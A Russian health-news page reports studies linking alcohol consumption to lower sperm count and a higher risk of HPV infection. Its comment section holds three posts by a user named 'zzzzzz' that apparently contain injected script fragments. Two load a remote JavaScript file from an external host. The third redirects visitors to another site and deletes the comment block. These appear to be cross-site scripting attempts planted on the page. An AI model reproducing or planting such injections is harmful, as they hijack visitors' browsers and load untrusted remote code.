Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Водка убивает сперму! Ест...  >>  Водка убивает сперму! Есть ли спасение?
 
Обратная связь
 

Водка убивает сперму! Есть ли спасение?

Размер шрифта
30 апреля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Чем больше алкоголя употребляет мужчина, тем ниже качество его спермы, заявляют ученые.

Водка убивает сперму! Есть ли спасение?

«Во многих исследованиях было показано, что избыточное употребление алкоголя наносит вред организму человека, однако вопрос его влияния на репродуктивное здоровье до сих пор не был подробно изучен», – рассказывает доктор Майкл Эйзенберг, профессор урологии в Стенфордском Университете.

Ученые обнаружили, что число сперматозоидов было наиболее низким у тех мужчин, которые выпивали 40 и более единиц алкоголя в неделю. Однако также выяснилось, что негативный эффект на состав спермы оказывают даже небольшие дозы алкоголя – пяти единиц в неделю было вполне достаточно. Об этом рассказала доктор Тина Колд Дженсен, профессор из Университета южной Дании. Одна единица алкоголя – это, к примеру, кружка пива или бокал вина.

В исследовании приняли участие более 1 200 мужчин в возрасте от 18 до 28 лет, которые проходили обязательное медицинское обследование для службы в армии. Все они заполнили опросники, где указали количество алкоголя, которое они обычно употребляют. Также у всех участников был взят анализ крови и образец спермы.

Общее количество спермы и концентрация сперматозоидов были ниже у тех мужчин, которые употребляли минимум пять единиц алкоголя в неделю, по сравнению с теми, кто выпивал не более одной единицы. Однако с увеличением количества употребляемого алкоголя возрастал и уровень тестостерона в крови. Количество сперматозоидов и качество спермы были значительно снижены у тех мужчин, которые выпивали более 25 единиц алкоголя в неделю. У тех, кто выпивал более 40 единиц, количество сперматозоидов было на 33% ниже, чем у тех, кто выпивал не более пяти единиц в неделю.

По мнению доктора Майкла Херда, акушера-гинеколога и эндокринолога из клиники Хьюстона, алкогольная интоксикация приводит к изменению содержания гормонов и некоторых других веществ в организме, таких как кортизол, глюкоза, инсулин и мужские половые гормоны. «Все это оказывает влияние на качество спермы», – считает он. «А качество спермы в свою очередь влияет на возможность зачатия».

В журнале Sexually Transmitted Infections недавно было опубликовано еще одно исследование, согласно которому употребление большого количества алкоголя повышает риск заразиться вирусом папилломы человека (ВПЧ), который передается половым путем. ВПЧ может стать причиной возникновения опухолей головы и шеи, а также рака прямой кишки и полового члена у мужчин. Мужчины до 27 лет могут пройти вакцинацию, которая защищает от двух штаммов этого вируса.

В этом исследовании участвовало более 1 300 американцев. Ученые выяснили, что у тех, кто выпивал более 10 граммов алкоголя в день, вероятность заразиться ВПЧ была на 13% выше, а вероятность заразиться штаммом, вызывающим рак, была выше на 35%, по сравнению с теми, кто употреблял менее 0,1 грамма алкоголя.

Более ранние исследования показали, что умеренное употребление алкоголя может снизить способность организма бороться с вирусными инфекциями. «Алкоголь влияет на иммунную систему, что может увеличить риск заразиться вирусом папилломы человека», – объясняет Херд.

«Результаты новых исследований еще раз подтверждают тот факт, что алкоголь негативно влияет на состояние организма, а также на способность к зачатию», – резюмирует доктор Эйзенберг.

Так что вам стоит еще раз задуматься, прежде чем заказывать в баре очередной коктейль. А если вы хотите увеличить свои шансы завести ребенка, врачи рекомендуют и вовсе отказаться от алкоголя.

Другие статьи о здоровье наших мужчин читайте на страницах одноименного спецпроекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:11

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что налить мужу перед постелью, чтобы вам было хорошо   Хотите посмотреть, сколько проживет ваш мужчина – посмотрите на его сперму!   Playboy отказался от голых девушек! Как порно влияет на мозг   Цвет глаз мужчины скажет, алкоголик он или нет!  
11 апреля 2013Каждая 30-я смерть от рака из-за водки 30 августа 2012Грецкие орехи улучшают качество спермы!
 
29 ноября 2011Wi-Fi грозит бесплодием? 12 августа 2011Только четверть россиян не пьет
 

Слайдшоу

1
Главные причины депрессии и как от них избавиться
Что вызывает бесплодие у мужчин
Стериотипы о женщинах, которые подтверждает наука

Тесты

1
Яички – удивительный орган
Есть ли у вас остеопороз?
Что вы знаете о цистите?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.